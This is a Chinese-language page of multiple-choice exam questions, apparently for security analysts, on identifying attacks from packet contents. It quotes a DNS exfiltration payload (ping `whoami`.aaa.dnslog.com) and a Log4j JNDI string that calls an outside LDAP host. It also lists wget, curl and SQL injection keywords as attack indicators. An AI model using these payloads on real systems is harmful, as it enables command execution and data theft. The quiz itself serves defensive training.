單項選擇題網(wǎng)絡數(shù)據(jù)包中出現(xiàn)ping `whoami`.aaa.dnslog.com,攻擊者最有可能的目的是哪項()
A.xss漏洞攻擊
B.單純執(zhí)行ping命令
C.把whoami命令執(zhí)行結果,通過dns域名顯示出來
D.SQL注入漏洞攻擊
您可能感興趣的試卷
你可能感興趣的試題
1.單項選擇題網(wǎng)絡數(shù)據(jù)包中出現(xiàn)新增jsp、php、aspx腳本語言文件的加密流量,說明攻擊者有可能正在進行哪項操作()
A.正常請求訪問
B.連接webshell進行服務器操作
C.漏洞掃描
2.單項選擇題網(wǎng)絡數(shù)據(jù)包中出現(xiàn)wget、curl等字眼時,說明攻擊者最有可能采取以下哪種漏洞攻擊()
A.xss漏洞攻擊
B.xml注入漏洞攻擊
C.命令執(zhí)行漏洞攻擊
D.SQL注入漏洞攻擊
3.單項選擇題在攻擊數(shù)據(jù)包中,出現(xiàn)select、database()、user()、version()等字眼,可能是以下哪種攻擊()
A.xss漏洞攻擊
B.ssrf漏洞攻擊
C.文件上傳漏洞攻擊
D.SQL注入漏洞攻擊
4.單項選擇題在攻擊數(shù)據(jù)包中,出現(xiàn)@type的字眼,可能是以下哪種攻擊()
A.ssrf漏洞攻擊
B.Log4j漏洞攻擊
C.csrf漏洞攻擊
D.Fastjson漏洞攻擊
5.單項選擇題數(shù)據(jù)包Cookie中帶有rememberMe字樣,說明此系統(tǒng)最有可能使用了什么框架組件()
A.Fastjson
B.Log4j
C.Spring
D.Shiro
6.單項選擇題通過以下哪個平臺,可以在不對攻擊IP進行端口掃描的前提下,初步獲取到該IP的端資產(chǎn)信息()
A.virustotal
B.fofa
C.DNSlog平臺
7.單項選擇題以下哪種方式可以加快溯源到攻擊者的社交軟件ID()
A.部署WAF
B.部署IPS
C.部署蜜罐
D.部署防火墻
8.單項選擇題在攻擊數(shù)據(jù)包中,出現(xiàn)${jndi:ldap://111.xxx.io}的字眼,可能是以下哪種攻擊()
A.ssrf漏洞攻擊
B.Log4j漏洞攻擊
C.csrf漏洞攻擊
D.SQL注入漏洞攻擊
9.單項選擇題在攻擊數(shù)據(jù)包中,頻繁出現(xiàn)單引號’,雙引號",and,or之類的字眼,可能是以下哪種攻擊()
A.xss漏洞攻擊
B.ssrf漏洞攻擊
C.csrf漏洞攻擊
D.SQL注入漏洞攻擊
10.單項選擇題Nmap使用什么參數(shù)進行腳本調用()
A.-p
B.-iL
C.-script
D.-T
最新試題
下列哪種安全評估類型定期檢查系統(tǒng)的安全性并提出建議()
題型:單項選擇題
下列哪個安全協(xié)議用于安全地遠程登錄到服務器()
題型:單項選擇題
防御惡意軟件的策略包括以下哪些()
題型:多項選擇題
當web服務器訪問人數(shù)超過了設計訪問人數(shù)上限,將可能出現(xiàn)的HTTP狀態(tài)碼是()
題型:單項選擇題
下列哪項法規(guī)旨在保護個人隱私和數(shù)據(jù)安全()
題型:單項選擇題
安全策略實施的步驟包括()
題型:多項選擇題
以下最有效的防范上傳漏洞的方式是什么()
題型:單項選擇題
信息系統(tǒng)等級保護實施過程有()
題型:多項選擇題
網(wǎng)絡安全風險評估的目的是()
題型:多項選擇題
下列哪種備份類型備份所有更改的文件()
題型:單項選擇題